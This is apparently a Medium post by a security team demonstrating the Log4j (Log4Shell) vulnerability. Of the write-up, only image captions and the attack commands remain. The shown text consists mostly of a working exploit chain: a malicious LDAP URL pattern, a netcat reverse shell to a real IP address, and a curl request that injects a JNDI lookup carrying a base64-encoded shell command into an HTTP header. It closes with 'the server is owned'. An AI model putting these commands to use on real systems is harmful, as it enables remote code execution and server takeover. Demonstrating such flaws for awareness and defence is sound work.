Log4j Demonstration

vulnerable server
vulnerable server
malicious ldap server
malicious ldap server
listening for remote shell
netcat listener
ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
nc 3.86.225.135 4444 -e /bin/sh
base64 encode the remote shell command
curl 52.23.211.253:8080 -H 'X-Api-Version: ${jndi:ldap://3.86.225.135:1389/Basic/Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}' 
launching the attack
launching the attack
errors the vulnerable server
command received
received the command
profit
Profit! the server is owned.
ref: https://www.lunasec.io/docs/blog/log4j-zero-day/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
VXRL

VXRL

VXRL Team is founded by group of enthusiastic security researchers, providing information security services and contribute to the community. https://www.vxrl.hk